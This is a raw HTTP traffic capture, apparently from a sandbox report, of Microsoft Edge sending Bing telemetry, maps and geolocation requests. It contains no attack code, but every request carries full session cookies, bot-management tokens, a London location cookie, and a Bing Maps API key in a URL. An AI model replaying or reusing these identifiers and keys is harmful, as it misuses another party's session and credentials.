cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10a78
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886941%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886941%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10a82
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10a87
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306886977%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

cache-control: public, max-age=600
content-type: image/jpeg
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
x-bm-traceid: 767207af63864d6596eb2c685cc46bdd
x-bm-srv: mapsplatform-frontend-b64849bbd-cd759, mapsplatform-imagery-service-645d78b797-572br
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 10
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 767207AF63864D6596EB2C685CC46BDD Ref B: LON212050703045 Ref C: 2024-12-04T10:08:16Z
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10a91
GET

https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=344,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=344,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10ae0
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10ae1
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887026%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306887026%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
